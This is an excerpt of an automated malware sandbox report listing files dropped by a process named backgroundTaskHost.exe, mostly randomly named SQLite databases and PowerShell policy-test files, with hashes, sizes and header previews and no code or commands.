                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\UYzMDU333T

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\UegalEoxZ1

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\UfjqS0ja4u

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\Uj3Yduk0ZT

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\UsjMM4YJM0

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\VADvVemgKz

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\WJiv9AI43P

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\WWV5Fl1V7B

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\WehzgPplqV

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\WnkLkImgaI

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\WxDXpmDz3I

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\XZAiGtgeU7

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\XnkOCelF2F

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\Xy7MKudtS3

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\YBYAe5d0g0

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\YOiA2KEX1E

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\YVPPO2vPLT

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\Yb5bPeIcfk

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\Z1ZFOv3uRm

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\ZgdbvMxbP3

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):98304
                                                                                          Entropy (8bit):0.08235737944063153
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02imbs0n.uis.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0bo5bixs.jbf.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11du23ye.n5x.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1dbs5diz.i2w.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
